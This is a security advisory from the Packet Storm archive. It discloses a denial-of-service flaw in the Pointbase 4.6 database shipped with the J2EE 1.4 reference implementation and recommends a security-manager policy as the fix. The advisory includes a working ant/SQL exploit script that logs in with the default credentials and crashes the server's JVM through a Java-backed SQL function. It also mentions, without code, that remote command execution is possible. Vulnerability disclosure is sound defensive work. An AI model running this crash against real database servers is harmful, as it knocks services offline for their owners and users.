j2ee.pointbase.txt

2004-01-19T00:00:00
ID PACKETSTORM:32527
Type packetstorm
Reporter Marc Schoenefeld
Modified 2004-01-19T00:00:00

Description

                                        
                                            `Hi,  
  
the following code crashes the Pointbase 4.6 database that comes with the  
J2EE reference implementation. It is provided as an ant script for  
flexibility and to illustrate the involved ressources.  
  
This is a cross-platform denial-of-service java exploit, caused by fact that  
the pointbase installation coming with j2ee/ri 1.4. is not equipped with an  
appropriate security manager, thus giving all jars implicitly all  
permissions. These unlimited permissions can be exploited by an attacker  
using jdbc to crash the jvm running the pointbase server.  
  
Unfortunately there is no policy file provided by Sun defining the necessary  
permissions for pointbase, leaving the application server deployer alone in  
the rain. And it is a long, time-consuming job figuring out the permissions  
when starting with a zero-permissions policy-file.  
  
A recommended approach to find out the necessary permissions of an  
application tailored to the use case is test-driving the application with  
jchains (www.jchains.org) and using this tool to record the needed  
permissions in a permission template. After fine-tuning the recorded  
permissions and starting the application with a security manager that is  
configured with these permissions the applications runs in a confined  
"sandbox" mode, which prevents attackers from access vulnerable jdk routines  
like sun.misc.MessageUtils.toStderr.  
  
Further exploitations possible are information disclosure and remote command  
injection (tested on java/winxp and java/linux where I was able to start a  
notepad.exe (win) or xemacs (linux)) on the pointbase server via a jdbc  
command). Further details on these vulnerabilities and which major JDBC  
database are vulnerable (it is not only pointbase having this bug, you may  
remember the jboss vulnerability in 9/2003) can be read in an upcoming  
report by illegalaccess.org.  
  
If interested in more details you can contact me.  
(marc[at]marc-schoenefeld.com) Also send me an email to get a policy file  
tailored to the pointbase installation of j2ee14ri. Also feel free to  
download the jChains tool and send me your suggestions and further thoughts  
about it. jChains is free to use for educational purposes only, so you need  
to ask me for restrictions for any commercial usage.  
  
Cheers  
Marc Schoenefeld (marc[at]illegalaccess.org)  
  
======================build.xml=======================  
  
.(.!-- pointbase denial-of-service by marc schoenefeld --".).  
  
.(.project default="dos".).  
  
.(.property name="host" value="192.168.0.7"/.).  
  
.(.target name="dos".).  
.(.sql  
driver="com.pointbase.jdbc.jdbcUniversalDriver"  
url="jdbc:pointbase://${host}:9092/sample"  
userid="pbpublic"  
password="pbpublic"  
print="true"  
.).  
.(.![CDATA[  
//DROP FUNCTION CRASH5(VARCHAR(20));  
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA  
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL;  
SELECT CRASH5(null) from SYSUSERS;  
]].).  
.(.classpath.).  
.(.pathelement location="pbclient.jar"/.).  
.(./classpath.).  
  
.(./sql.).  
  
.(./target.).  
  
.(./project.).  
  
  
======================build.xml=======================  
  
--  
  
Never be afraid to try something new. Remember, amateurs built the  
ark; professionals built the Titanic. -- Anonymous  
  
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer  
`